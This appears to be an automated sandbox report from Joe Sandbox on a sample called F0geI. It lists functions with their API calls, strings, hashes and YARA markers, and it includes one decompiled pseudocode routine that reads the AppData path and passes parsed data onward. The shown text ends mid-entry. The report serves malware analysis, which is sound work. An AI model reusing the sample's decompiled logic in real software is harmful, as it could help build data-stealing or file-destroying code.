Instruction ID: 450d1dfee8fa2ecf418071b880db30477ccddcbf9b4d8a8ac913662de2b6915a
Opcode Fuzzy Hash: 743d3936997c352c872d7cf10618c75b7b5c1b542be5bb5ea46889d68cad6593
Instruction Fuzzy Hash: 04F1C231900224EFDB05EFA6EE44AAE7BB5FF48710F104864F951B32A0DB749920DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0208B3DE Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 275fileCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000), ref: 0208B575
LocalFree.KERNEL32(00000000), ref: 0208B654
LocalFree.KERNEL32(?), ref: 0208B65F
LocalFree.KERNEL32(?), ref: 0208B669
LocalFree.KERNEL32(?), ref: 0208B670
LocalFree.KERNEL32(00000000), ref: 0208B677
CloseHandle.KERNEL32(?), ref: 0208B682
DeleteFileW.KERNEL32(?), ref: 0208B689
LocalFree.KERNEL32(?), ref: 0208B6EA
LocalFree.KERNEL32(00000000), ref: 0208B6F1
LocalFree.KERNEL32(?), ref: 0208B6FB
LocalFree.KERNEL32(00000000), ref: 0208B702
LocalFree.KERNEL32(?), ref: 0208B70B
LocalFree.KERNEL32(00000000), ref: 0208B712
DeleteFileW.KERNEL32(?), ref: 0208B719
LocalFree.KERNEL32(?), ref: 0208B740
FindClose.KERNEL32(00000000), ref: 0208B747

Part of subcall function 0208A975: LocalFree.KERNEL32(?), ref: 0208AA29

Part of subcall function 0208B3DE: LocalFree.KERNEL32(00000000), ref: 0208B4C4

Strings

., xrefs: 0208B453
X_, xrefs: 0208B5A6
x`, xrefs: 0208B599

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$File$CloseDelete$FindHandleSize
String ID: .$x`$X_
API String ID: 948424528-3117628237
Opcode ID: 9efa7dd12d013d1a44ae699e025aa845af9bad0d35c456780079ac2c1191b97f
Instruction ID: 83ee40eaa07bb6999317344bf03669c42cf8138a37809f4ea1ab7afaacfa7afe
Opcode Fuzzy Hash: 9efa7dd12d013d1a44ae699e025aa845af9bad0d35c456780079ac2c1191b97f
Instruction Fuzzy Hash: 0DA18371204311AFD704EF65DE84F6B77E6EB88704F004928FA95A72A0DB74EC11DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00420F47 Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

__inc.LIBCMTD ref: 00420F8C
_isdigit.LIBCMTD ref: 00420FB2
___check_float_string.LIBCMTD ref: 00421012
__inc.LIBCMTD ref: 00421030
_isdigit.LIBCMTD ref: 004210E2
___check_float_string.LIBCMTD ref: 00421142
___check_float_string.LIBCMTD ref: 004210C9

Part of subcall function 004216A0: __nh_malloc_dbg.LIBCMTD ref: 004216FD

__inc.LIBCMTD ref: 0042108D

Part of subcall function 00421800: __filbuf.LIBCMTD ref: 00421841

___check_float_string.LIBCMTD ref: 004211D6
__inc.LIBCMTD ref: 004211F4
___check_float_string.LIBCMTD ref: 00421237
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

+, xrefs: 0042124C

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: ___check_float_string$__inc$Locale_isdigit$UpdateUpdate::~___filbuf__nh_malloc_dbg
String ID: +
API String ID: 1483831053-2126386893
Opcode ID: c35f91d167e3a57fa736c0f9cbc30fc036796ab7872d9175b5daee21bb42ebbd
Instruction ID: 47227cab4d599e2255cfe454b9df9279d6ecde979f53f72c50d2db3852e4d8b6
Opcode Fuzzy Hash: c35f91d167e3a57fa736c0f9cbc30fc036796ab7872d9175b5daee21bb42ebbd
Instruction Fuzzy Hash: 46F194B1E002699BCF24CF99DC80AEEB775BF54304F54819ED81AA7312D7399A80CF55

Uniqueness

Uniqueness Score: -1.00%

Function 020897E8 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 309registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

RegCloseKey.ADVAPI32(00000000), ref: 0208982D
LocalFree.KERNEL32(00000000), ref: 02089898
RegCloseKey.ADVAPI32(000F003F), ref: 020898A1
RegCloseKey.ADVAPI32(00000000), ref: 020899B5
LocalFree.KERNEL32(00000000), ref: 02089A3E
RegCloseKey.ADVAPI32(000F003F), ref: 02089A47

Strings

?, xrefs: 020897F8

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: Close$Free$Local$Global
String ID: ?
API String ID: 669500343-1684325040
Opcode ID: 810266c1436c83679cd00da3e4cb33eccda6db4c1c17b890659f6915c65a8da9
Instruction ID: 97a044250cb8511f50734c32d62cd7fef47bf95f4dd5ab36de024dbcbdd3aeaf
Opcode Fuzzy Hash: 810266c1436c83679cd00da3e4cb33eccda6db4c1c17b890659f6915c65a8da9
Instruction Fuzzy Hash: 69B15C71A00219BFDB05EFA6DD84EAFBBB9EF49350F104425FA09B6260D7709A10DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004244D6 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 220COMMON

Download Yara Rule

APIs

_wcscpy_s.LIBCMTD ref: 004244FD

Part of subcall function 00419280: __errno.LIBCMTD ref: 004192D4

__invoke_watson_if_error.LIBCMTD ref: 00424506
__invoke_watson_if_error.LIBCMTD ref: 0042457D
__errno.LIBCMTD ref: 004245B2
__errno.LIBCMTD ref: 004245BF

Strings

n#@, xrefs: 00424737, 0042473D
n#@, xrefs: 00424729, 0042472F
n#@, xrefs: 0042476F, 00424775, 00424784
`r@, xrefs: 00424768, 0042476E
n#@, xrefs: 00424745, 0042474B
`r@, xrefs: 00424556, 0042455C
n#@, xrefs: 00424753, 00424759
QP#, xrefs: 0042479A

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __errno$__invoke_watson_if_error$_wcscpy_s
String ID: QP#$`r@$`r@$n#@$n#@$n#@$n#@$n#@
API String ID: 1109857904-2602734993
Opcode ID: 2e6820e7d1c99436e4f461e7e9f65a6fbf290e7f012889dab3cd65e7e718bbde
Instruction ID: c8e87d1946ddb67400bc3ecb9fd161beea858cd9bcaf812c77095ccde34d7992
Opcode Fuzzy Hash: 2e6820e7d1c99436e4f461e7e9f65a6fbf290e7f012889dab3cd65e7e718bbde
Instruction Fuzzy Hash: D6917274E44218ABDB24DF50DC45BEE73B4AB85704F1084AAF609662C1D7BC9ED0CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0208762E Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 020879C9

Part of subcall function 0208A64B: LocalFree.KERNEL32(00000000,?,02083FAD,00000002,?), ref: 0208A6B0

ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 020878DA
LocalFree.KERNEL32(?), ref: 020878E3
LocalFree.KERNEL32(00000000), ref: 020878EA
LocalFree.KERNEL32(00000000), ref: 020878F1
LocalFree.KERNEL32(?), ref: 020878FA

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

ShellExecuteW.SHELL32(00000000,0040D968,?,?,00000000,00000000), ref: 0208792A
LocalFree.KERNEL32(?), ref: 02087934
LocalFree.KERNEL32(?), ref: 0208793D
LocalFree.KERNEL32(?), ref: 02087944
LocalFree.KERNEL32(?), ref: 0208794D
LocalFree.KERNEL32(?), ref: 02087975
LocalFree.KERNEL32(?), ref: 0208797E
LocalFree.KERNEL32(?), ref: 02087985
LocalFree.KERNEL32(?), ref: 0208798E
LocalFree.KERNEL32(?), ref: 0208799C
LocalFree.KERNEL32(00000000), ref: 020879AB
LocalFree.KERNEL32(00000000), ref: 020879B4

Strings

@W_, xrefs: 02087880

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: Free$Local$ExecuteShell$Global
String ID: @W_
API String ID: 3422199401-2180371236
Opcode ID: 2e40cf93ff22970fb201e2597e66e137a113e231ffdeba543525be583811f4b7
Instruction ID: 9596e342bbc929087766f242796c8bce07019759c41177016eb2ce8183949992
Opcode Fuzzy Hash: 2e40cf93ff22970fb201e2597e66e137a113e231ffdeba543525be583811f4b7
Instruction Fuzzy Hash: E5A10876A00325AFDB15ABA5DE44DBFBBB5EF48300B104824E941F7260DB70AD11DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 02082A1F Relevance: 30.4, APIs: 20, Instructions: 419fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 02082AAC

Part of subcall function 0208A905: LocalFree.KERNEL32(00000000,?,?,02082C15), ref: 0208A968

LocalFree.KERNEL32(00000000), ref: 02082AFB
LocalFree.KERNEL32(00000000), ref: 02082B0A
LocalFree.KERNEL32(00000000), ref: 02082B19
LocalFree.KERNEL32(00000000), ref: 02082B24
LocalFree.KERNEL32(00000000), ref: 02082B2F
LocalFree.KERNEL32(00000000), ref: 02082C54
LocalFree.KERNEL32(?), ref: 02082C5B
LocalFree.KERNEL32(00000000), ref: 02082C87
LocalFree.KERNEL32(?), ref: 02082C8E
LocalFree.KERNEL32(00000000), ref: 02082F06
DeleteFileW.KERNEL32(?), ref: 02082F0D
LocalFree.KERNEL32(?), ref: 02082F14

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: 14fe85006a4507c3b927e3539246f7d6684f254c4d25abfe7b05e8fd786a1328
Instruction ID: 79fc008faac16face9f8448f26feb0bb9c69c9bae7b64256f328faaf08c00019
Opcode Fuzzy Hash: 14fe85006a4507c3b927e3539246f7d6684f254c4d25abfe7b05e8fd786a1328
Instruction Fuzzy Hash: 40F1A072900225EFDB05EFA6DE44AAE7BB5FF08310F044825F915B32A0DB749920DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7E Relevance: 30.3, APIs: 24, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404F7E(void* __ecx, short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				short* _v44;
				void* _v48;
				signed int _v52;
				char _v56;
				signed int _t60;
				void* _t62;
				void* _t71;
				void* _t78;
				void* _t85;
				void* _t94;
				signed int _t103;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				char _t116;
				void* _t117;
				void* _t127;
				void* _t140;
				signed int _t142;
				void* _t144;
				signed int _t146;
				void* _t165;
				void* _t173;
				signed int _t177;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t184;
				void* _t187;
				void* _t188;
				signed int _t193;
				signed int _t197;
				void* _t199;
				void* _t202;

				_v24 = _v24 & 0x00000000;
				_t142 = 0;
				_v44 = __edx;
				_v40 = _v40 & 0;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e39c);
				_t177 = _t60;
				if(_t177 == 0) {
					return _t60 | 0xffffffff;
				}
				_t178 = _t177 + 0xc;
				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
				if(_t62 == 0) {
					L5:
					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
						_t180 = _t178 + _t142 * 2 + 2;
						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
						_v12 = _t71;
						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
							_t182 = _t180 + _t193 * 2 + 2;
							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
							_v16 = _t78;
							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
								_t184 = _t182 + _t197 * 2 + 2;
								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
								_push( *0x40e228);
								_v20 = _t85;
								_push(_t184);
								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, 0x4000);
									_v28 = _t199;
									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_push(0);
									_t144 = _t94;
									_push(0x1a);
									_push(_t144);
									_push(0);
									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
										_push(_v12);
										_push(_t144);
										_push(_t144);
										if( *((intOrPtr*)( *0x40e000))() != 0) {
											_v40 = 1;
											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24);
											if(_v24 > 0) {
												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t173 = 0x10;
												_t112 = E0040A05F(_t109, _t173);
												_t202 = _t112;
												_v48 = _t202;
												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
												_v52 = _v52 & 0x00000000;
												_v36 = _t115;
												_t116 =  *0x40e204; // 0x5f5980
												_v56 = _t116;
												_t117 = E00408619( &_v36);
												_v32 = _t117;
												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
												if(_t165 == 0) {
													_t199 = _v28;
												} else {
													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
													_t199 = _v28;
													if(_t127 != 0) {
														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
													}
												}
												LocalFree(_t187);
												LocalFree(_v32);
												LocalFree(_v36);
												LocalFree(_v48);
											}
										}
									}
									LocalFree(_v8);
									LocalFree(_v12);
									LocalFree(_v16);
									LocalFree(_v20);
									LocalFree(_t144);
									LocalFree(_t199);
									_t103 = _v40;
									L23:
									return _t103;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								LocalFree(_v16);
								LocalFree(_v20);
								_push(0xfffffffa);
								L13:
								_pop(_t103);
								goto L23;
							}
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_v16);
							_push(0xfffffffb);
							goto L13;
						}
						LocalFree(_v8);
						LocalFree(_v12);
						_push(0xfffffffc);
						goto L13;
					}
					LocalFree(_v8);
					_push(0xfffffffd);
					goto L13;
				} else {
					_t146 = _t62 - _t178;
					_t142 = _t146 >> 1;
					if(_t146 >= 0) {
						goto L5;
					}
					_t140 = 0xfffffffe;
					return _t140;
				}
			}

0x00404f89
0x00404f95
0x00404f97
0x00404f9a
0x00404f9e
0x00404fa0
0x00404fa4
0x00000000
0x00404fa6
0x00404fb9
0x00404fbd
0x00404fc1
0x00404fd3
0x00404fef
0x00404ffd
0x0040501d
0x00405028
0x00405030
0x00405044
0x00405053
0x0040507c
0x00405087
0x0040508f
0x004050a3
0x004050b0
0x004050df
0x004050ea
0x004050ec
0x004050f2
0x004050fa
0x00405111
0x0040514d
0x0040515b
0x0040515e
0x00405160
0x00405162
0x00405169
0x0040516b
0x0040516c
0x00405172
0x00405178
0x00405180
0x00405181
0x00405186
0x0040518f
0x004051a5
0x004051b1
0x004051c4
0x004051d0
0x004051d4
0x004051d9
0x004051e4
0x004051ec
0x004051f5
0x004051fa
0x00405201
0x00405204
0x00405209
0x0040520c
0x00405216
0x00405224
0x0040523a
0x0040523e
0x0040527b
0x00405240
0x00405254
0x00405256
0x0040525b
0x00405271
0x00405276
0x0040525b
0x0040527f
0x00405288
0x00405291
0x0040529a
0x0040529a
0x004051b1
0x00405186
0x004052a3
0x004052ac
0x004052b5
0x004052be
0x004052c5
0x004052cc
0x004052d2
0x004052d5
0x00000000
0x004052d5
0x00405116
0x0040511f
0x00405128
0x00405131
0x00405137
0x00405139
0x00405139
0x00000000
0x00405139
0x004050b5
0x004050be
0x004050c7
0x004050cd
0x00000000
0x004050cd
0x00405058
0x00405061
0x00405067
0x00000000
0x00405067
0x00405002
0x00405008
0x00000000
0x00404fc3
0x00404fc5
0x00404fc7
0x00404fc9
0x00000000
0x00000000
0x00404fcd
0x00000000
0x00404fcd

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937580b39e1dac34c8be290e668e2f957a9367b864d1b1cf711a633e2adb4025
Instruction ID: a5171e7b5a3df4f463689049ce4a04ed549f9b8857e4f558dcc9ab38b60404ef
Opcode Fuzzy Hash: 937580b39e1dac34c8be290e668e2f957a9367b864d1b1cf711a633e2adb4025
Instruction Fuzzy Hash: 06A1C371A00215AFDB009BEADE45EAE7BB5EF48310F104535F614F72E0DBB86D218B69

Uniqueness

Uniqueness Score: -1.00%

Function 02082F1F Relevance: 30.2, APIs: 15, Strings: 2, Instructions: 440fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 02082FAE

Part of subcall function 0208A905: LocalFree.KERNEL32(00000000,?,?,02082C15), ref: 0208A968

StrCpyW.SHLWAPI(?,?), ref: 02082FEE
LocalFree.KERNEL32(00000000), ref: 02082FF9
LocalFree.KERNEL32(00000000), ref: 02083008
LocalFree.KERNEL32(00000000), ref: 02083017
LocalFree.KERNEL32(00000000), ref: 02083026
LocalFree.KERNEL32(00000000), ref: 02083031
DeleteFileW.KERNEL32(?), ref: 02083197
LocalFree.KERNEL32(?), ref: 0208319E
LocalFree.KERNEL32(00000000), ref: 020831B6
LocalFree.KERNEL32(00000000), ref: 02083432
LocalFree.KERNEL32(?), ref: 0208343B
LocalFree.KERNEL32(00000000), ref: 02083449
LocalFree.KERNEL32(00000000), ref: 02083453
DeleteFileW.KERNEL32(?), ref: 0208348A

Strings

FALSE, xrefs: 0208334C, 020833F8
TRUE, xrefs: 02083351, 0208335C, 020833F3, 02083400

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: FALSE$TRUE
API String ID: 2194112602-1412513891
Opcode ID: d2b305aae021969603c5b297492c78034a2985e289075661334c01097b3b4819
Instruction ID: f8e5c48d34f3c37a3ce1053cd336370339f65494301a7742032b1d33cb1b4e88
Opcode Fuzzy Hash: d2b305aae021969603c5b297492c78034a2985e289075661334c01097b3b4819
Instruction Fuzzy Hash: 3C026071900219EFDF05AFA2EE48AAEBBB5FF48700F104475E911B72A0DB759920DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004209EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 387COMMON

Download Yara Rule

APIs

__inc.LIBCMTD ref: 00420A41
__inc.LIBCMTD ref: 00420A69
__inc.LIBCMTD ref: 00420A9C
__un_inc.LIBCMTD ref: 00420B23
_isxdigit.LIBCMTD ref: 00420BBD
__hextodec.LIBCMTD ref: 00420BF0

Strings

F, xrefs: 00420EBB
8, xrefs: 00420DD5

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __inc$__hextodec__un_inc_isxdigit
String ID: 8$F
API String ID: 3652663768-3144575033
Opcode ID: 44975e82e32c5666a07394cae5dd75be6fc01165a8bdc5575b6d52771f1f6d81
Instruction ID: cbc3e990046101d15e9f01f9175547261931542e588062fa9cf526bccf962501
Opcode Fuzzy Hash: 44975e82e32c5666a07394cae5dd75be6fc01165a8bdc5575b6d52771f1f6d81
Instruction Fuzzy Hash: C8028FB0E052698BCF24CF65E8943EEBBB1AF55308F5481DAD81967303D2799E81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0042FED9 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042FF68
_get_int64_arg.LIBCMTD ref: 0042FF90
__aullrem.LIBCMT ref: 00430135
__aulldiv.LIBCMT ref: 00430157
_write_multi_char.LIBCMTD ref: 0043025E
_write_string.LIBCMTD ref: 00430279
_write_multi_char.LIBCMTD ref: 004302A5
_wctomb_s.LIBCMTD ref: 00430322

Strings

-, xrefs: 004301FE
9, xrefs: 00430168

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
String ID: -$9
API String ID: 3451365851-1631151375
Opcode ID: cb27d96736e196417b3c79b30a33bffabc01b3be02829a97fd44d4dcadda5e2e
Instruction ID: 6fbb936e6e21048b28befd4e543fd591277d1b1e0142e501cd9668f9e3d1ea79
Opcode Fuzzy Hash: cb27d96736e196417b3c79b30a33bffabc01b3be02829a97fd44d4dcadda5e2e
Instruction Fuzzy Hash: 14F14A71D052299FDB24CF58DC99BAEB7B1BB48304F1482EAE409A7241D7389E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02083C3E Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 223fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

GetFileSize.KERNEL32(00000000,00000000), ref: 02083D35
LocalFree.KERNEL32(00000000), ref: 02083E62
LocalFree.KERNEL32(?), ref: 02083E6B
LocalFree.KERNEL32(?), ref: 02083E72
LocalFree.KERNEL32(00000000), ref: 02083E79
FindClose.KERNEL32(00000002), ref: 02083EA0
LocalFree.KERNEL32(00000002), ref: 02083EA9
LocalFree.KERNEL32(?), ref: 02083EB9
LocalFree.KERNEL32(00000000), ref: 02083EC0
LocalFree.KERNEL32(?), ref: 02083EC7
LocalFree.KERNEL32(00000000), ref: 02083ECE
LocalFree.KERNEL32(?), ref: 02083ED7
LocalFree.KERNEL32(?), ref: 02083EE0
LocalFree.KERNEL32(00000000), ref: 02083EE7
DeleteFileW.KERNEL32(?), ref: 02083EEE

Part of subcall function 0208A905: LocalFree.KERNEL32(00000000,?,?,02082C15), ref: 0208A968

Strings

X_, xrefs: 02083D66, 02083DAB
x`, xrefs: 02083D59

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: Free$Local$File$CloseDeleteFindGlobalSize
String ID: x`$X_
API String ID: 952173178-2408541153
Opcode ID: c0af09b8467f81c6f5b6c21aa0467688919da5cab6ecacf54911a18db2b2d236
Instruction ID: 2a958297bd2c9f0ebfa943d571a39674f490cc4111088fa976d1b1b8819aa107
Opcode Fuzzy Hash: c0af09b8467f81c6f5b6c21aa0467688919da5cab6ecacf54911a18db2b2d236
Instruction Fuzzy Hash: 71719271A00314AFDB04EBB2DE58EAF77B6EB88700F108968F515B7290DB749D11DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0043124B Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 365COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004312E0
_get_int64_arg.LIBCMTD ref: 00431308
__aullrem.LIBCMT ref: 004314B0
__aulldiv.LIBCMT ref: 004314D2
_write_multi_char.LIBCMTD ref: 004315EB
_write_string.LIBCMTD ref: 00431606
_write_multi_char.LIBCMTD ref: 00431632
__mbtowc_l.LIBCMTD ref: 004316A1

Strings

9, xrefs: 004314E3

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
String ID: 9
API String ID: 3455034128-2366072709
Opcode ID: b16d0459f862c8420226f9aca193c90cfa6dc0c538bc7cc83c81076bc6952c3b
Instruction ID: 2c41f508bb318b1f8b5bc08ec9acbbca8298e5514b934a7e44ca097c7124a9b6
Opcode Fuzzy Hash: b16d0459f862c8420226f9aca193c90cfa6dc0c538bc7cc83c81076bc6952c3b
Instruction Fuzzy Hash: 06F159B1E002299FDB24CF58CC81BAEB7B5FF88314F14519AE509AB251D7389E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0208B06D Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 300COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 0208B0B5
LocalFree.KERNEL32(00000000), ref: 0208B110
LocalFree.KERNEL32(00000000), ref: 0208B117

Strings

x`, xrefs: 0208B257

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$FolderPathSpecial
String ID: x`
API String ID: 1941890384-1397163517
Opcode ID: 72788095e3ba856c56753af6b7a68af839d158276ac543cc7c9517f84d2339a1
Instruction ID: e3f028038712ae9d5b5aca5c9fcc4ede649ab4a37ff4a25e9cd88c2ad74e7d07
Opcode Fuzzy Hash: 72788095e3ba856c56753af6b7a68af839d158276ac543cc7c9517f84d2339a1
Instruction Fuzzy Hash: F4A1C271A00219AFDB14EBA5DD89FAF7BB5EB48314F004428F615F7290CBB49910DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0208698C Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 321COMMON

Download Yara Rule

APIs

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 02086A20

Strings

., xrefs: 020869F6
`X_, xrefs: 02086B30, 02086B8E, 02086BE6

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: CombineFreeGlobalPath
String ID: .$`X_
API String ID: 1842026532-1457655304
Opcode ID: e2b1b369697f91e98e90e0f59b02c0883434508b7dc7d4233a499d6016bd9fa5
Instruction ID: ff3f09458bdd36672a452b9ec1b01c9256dbc115005ad87115bb8bb315e40eb7
Opcode Fuzzy Hash: e2b1b369697f91e98e90e0f59b02c0883434508b7dc7d4233a499d6016bd9fa5
Instruction Fuzzy Hash: C5C16FB1E00219AFDB04EFA5DE44AAEBBBAEB48310F104429E915B7390DB745911DF64

Uniqueness

Uniqueness Score: -1.00%

Function 004246D0 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 105windowCOMMON

Download Yara Rule

APIs

__invoke_watson_if_oneof.LIBCMTD ref: 004247CE
__errno.LIBCMTD ref: 004247C6

Part of subcall function 00419D50: __getptd_noexit.LIBCMTD ref: 00419D56

__errno.LIBCMTD ref: 004247D6
_wcscpy_s.LIBCMTD ref: 00424810
__invoke_watson_if_error.LIBCMTD ref: 00424819
___crtMessageBoxW.LIBCMTD ref: 00424832
_raise.LIBCMTD ref: 0042484B

Strings

n#@, xrefs: 00424737, 0042473D
n#@, xrefs: 00424729, 0042472F
n#@, xrefs: 0042476F, 00424775, 00424784
`r@, xrefs: 00424768, 0042476E
n#@, xrefs: 00424745, 0042474B
n#@, xrefs: 00424753, 00424759
QP#, xrefs: 0042479A
n#@, xrefs: 004246E5

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

